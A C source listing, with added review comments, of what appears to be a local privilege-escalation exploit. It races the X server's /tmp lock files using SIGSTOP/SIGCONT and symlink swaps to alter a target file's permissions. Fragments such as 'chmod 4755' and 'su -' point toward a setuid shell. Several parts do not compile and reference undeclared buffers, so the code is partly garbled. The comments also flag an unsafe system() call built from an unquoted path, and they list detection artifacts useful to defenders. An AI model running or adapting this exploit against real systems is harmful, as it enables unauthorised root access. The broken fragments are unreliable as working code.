  1. #include <sys/types.h>
  2. #include <sys/stat.h>
  3. #include <fcntl.h>
  4. #include <unistd.h>
  5. #include <stdio.h>
  6. #include <syscall.h>
  7. #include <signal.h>
  8. #include <string.h>
  9. #include <stdlib.h>
  10.  
  /* Absolute path of the X server binary that launch_xorg_instance() executes. */
  11. #define XORG_BIN "/usr/bin/X"
  /* Display argument passed to the X server. main() uses DISPLAY+1 (the text
   * after the ':') to build the lock-file names under /tmp. */
  12. #define DISPLAY ":1"
  13.  
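  /**
   * Report the text that follows "tty" in the path descriptor 4 refers to.
   *
   * The path is read from the /proc/self/fd/4 symlink. The function only
   * inspects descriptor 4; it neither opens nor validates it (the original
   * author's note says it "seems to always be free").
   *
   * @return pointer to the characters after the first "tty" in that path, or
   *         NULL when the link cannot be read or contains no "tty". The
   *         pointer refers to a static buffer that the next call overwrites.
   *
   * Fixes over the pasted version: the result used to point into a local
   * array that was dead once the function returned, the readlink() result
   * was ignored, and a 128-byte link target left the buffer without a NUL
   * (readlink() never writes one).
   */
  char *get_tty_number(void) {
      /* static so the returned pointer stays valid after the call */
      static char tty_name[128];
      ssize_t len;
      char *ptr;

      /* leave one byte for the terminator readlink() does not add */
      len = readlink("/proc/self/fd/4", tty_name, sizeof(tty_name) - 1);
      if (len < 0)
          return NULL;
      tty_name[len] = '\0';

      ptr = strstr(tty_name, "tty");
      if (ptr == NULL)
          return NULL;
      return ptr + 3;
  }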
  22.  
  /**
   * Start one X server process for display DISPLAY.
   *
   * The child closes descriptors 1 and 2 before executing XORG_BIN, so the
   * server's stdout/stderr output is discarded. It is executed with an empty
   * environment (envp == NULL).
   *
   * @return in the parent, whatever fork() returned: the child's pid, or -1
   *         when fork() failed. Callers that pass this value to kill() must
   *         check for -1 first.
   */
  int launch_xorg_instance(void) {
      char *xorg_argv[] = { XORG_BIN, DISPLAY, NULL };
      int pid;

      pid = fork();
      if (pid == 0) {
          /* child: drop stdout and stderr, then become the X server */
          close(1);
          close(2);
          execve(XORG_BIN, xorg_argv, NULL);
          /* only reached when execve() failed; note the exit status is still 0 */
          _exit(0);
      }

      return pid;
  }
  34.  
  /*
   * Print a long listing of `file` by building the shell command
   * "ls -l <file>" and passing it to system().
   *
   * NOTE(review): this block does not compile as pasted. cmd2 and cmd3 are
   * used below but declared neither in this function nor anywhere else in
   * the listing, so what lines 39-43 were meant to run cannot be determined
   * from here.
   *
   * NOTE(review): `file` is copied into a fixed 524-byte buffer with an
   * unbounded sprintf() and reaches the shell unquoted. A long path
   * overflows cmd, and shell metacharacters in the path are interpreted by
   * /bin/sh. Listing the file with stat() instead of a shell avoids both.
   */
  35. void show_target_file(char *file) {
  36. char cmd[524];
  37. memset(cmd, '\0', sizeof(cmd));
  /* unbounded format into cmd; see the note above */
  38. sprintf(cmd, "ls -l %s", file);
  /* cmd2 is undeclared; the format string has no conversion, so `file` is unused here */
  39. memset(cmd2, '\0', sizeof(cmd2));
  40. sprintf(cmd2, "su -", file);
  41. system(cmd);
  42. system(cmd2);
  /* cmd3 is undeclared and never assigned in the visible code */
  43. system(cmd3);
  44. }
  45.  
  /*
   * Entry point: drives a timing race around the X server lock files for
   * display DISPLAY, i.e. /tmp/.X1-lock and /tmp/.tX1-lock.
   *
   * argv[1], when present, is the path whose permission bits are inspected
   * at the end; without it the path defaults to "/tmp/sh".
   *
   * Returns 0 when the final stat() shows the others-read bit set on the
   * target path, and 1 on every other exit (lock already present, attempts
   * exhausted, temporary lock reappeared, or bit not set).
   *
   * NOTE(review): this function does not compile as pasted. `vv` is declared
   * as int but used as a character buffer, and `file` is not declared in
   * main (lines 61-62).
   *
   * NOTE(review): the X server side is not shown. The logic presumably
   * depends on the server changing the mode of its temporary lock path by
   * name while following symlinks -- confirm against the installed server.
   * Symlink-following restrictions for sticky world-writable directories
   * (Linux fs.protected_symlinks) and a server that works on the open
   * descriptor rather than the path would be expected to defeat it.
   *
   * Host artifacts visible from this code, useful for detection:
   *   - a symlink /tmp/.X1-lock -> /dontexist owned by an unprivileged user;
   *   - a burst of short-lived "/usr/bin/X :1" children of one non-root
   *     process, each receiving SIGSTOP and/or SIGKILL;
   *   - a symlink /tmp/.tX1-lock pointing to a file outside /tmp.
   */
  46. int main(int argc, char **argv) {
  47. pid_t proc;
  48. struct stat st;
  49. int n, ret, vv, current_attempt = 800;
  50. char target_file[128], lockfiletmp[20], lockfile[20], *ttyno;
  /* NOTE(review): argv[1] is copied without a length check into a 128-byte buffer */
  51. if (argc < 2)
  52. strcpy(target_file, "/tmp/sh");
  53. else
  54. strcpy(target_file, argv[1]);
  /* DISPLAY+1 skips the leading ':' so the names become /tmp/.X1-lock and /tmp/.tX1-lock */
  55. sprintf(lockfile, "/tmp/.X%s-lock", DISPLAY+1);
  56. sprintf(lockfiletmp, "/tmp/.tX%s-lock", DISPLAY+1);
  /* give up when a lock for this display already exists */
  57. if (stat(lockfile, &st) == 0) {
  58. return 1;
  59. }
  /* occupy the final lock path with a dangling symlink */
  60. symlink("/dontexist", lockfile);
  /* these two lines do not compile (int vv, undeclared `file`); the string built here is never executed in the visible code */
  61. memset(vv, '\0', sizeof(vv));
  62. sprintf(vv, "chmod 4755 %s", file);
  /* return values ignored; for an unprivileged caller both calls would be expected to fail */
  63. setuid(0);
  64. setgid(0); // backup - failover
  65. umask(077);
  /* only tested against NULL further down, to choose the hint message */
  66. ttyno = get_tty_number();
  /* pre-decrement from 800: at most 799 rounds; current_attempt reaches 0 only when all of them are used up */
  67. while (--current_attempt) {
  68. proc = launch_xorg_instance();
  69. n = 0;
  /* busy-poll, up to 10000 raw stat() syscalls, until the temporary lock file appears */
  70. while (n++ < 10000)
  71. if ((ret = syscall(SYS_stat, lockfiletmp, &st)) == 0)
  72. break;
  73. if (ret == 0) {
  /* freeze the child, then re-read the temporary lock's mode */
  74. syscall(SYS_kill, proc, SIGSTOP);
  75. stat(lockfiletmp, &st);
  /* others-read bit still clear: leave the outer loop with the child left stopped */
  76. if ((st.st_mode & 4) == 0)
  77. break;
  /* the pid of this extra instance is discarded, so this code never signals it */
  78. launch_xorg_instance();
  79. sleep(2);
  80. }
  /* NOTE(review): proc is -1 when fork() failed, and kill(-1, ...) signals every process the caller is permitted to signal */
  81. kill(proc, SIGKILL);
  82. }
  83. if (current_attempt == 0) {
  84. printf("[-] Attack failed!\n");
  85. if (!ttyno)
  86. printf("[!] Try with console ownership: switch to a TTY* by using Ctrl-Alt-F[1-6] and try again.\n");
  87. return 1;
  88. }
  /* a second instance is started (pid discarded); abort if the temporary lock path exists after the 2 s wait */
  89. launch_xorg_instance();
  90. sleep(2);
  91. if (stat(lockfiletmp, &st) == 0) {
  92. return 1;
  93. }
  /* point the temporary lock path at the target, then let the stopped child continue */
  94. printf("[+] Creating symlink: (%s -> %s)\n", lockfiletmp,target_file);
  95. symlink(target_file, lockfiletmp);
  96. printf("[+] PID: %d resumed (SIGCONT sent)\n", proc);
  97. kill(proc, SIGCONT);
  98. usleep(30000);
  /* success is judged solely by the others-read bit on the target; the stat() result itself is not checked */
  99. stat(target_file, &st);
  100. if (!(st.st_mode & 004)) {
  101. printf("[-] Attack failed,yur rights are: %o ,yu could launch a simple attack from this uid shuld bypass many prots\n", st.st_mode);
  102. return 1;
  103. }
  104. unlink(lockfile);
  105. printf("[+] Attack worked: ls -l %s:\n", target_file);
  106. show_target_file(target_file);
  /* return value ignored; the process returns on the next line, so the directory change affects nothing afterwards */
  107. chdir("/tmp/sh"); // cd to our shell..
  108. return 0;
  109. }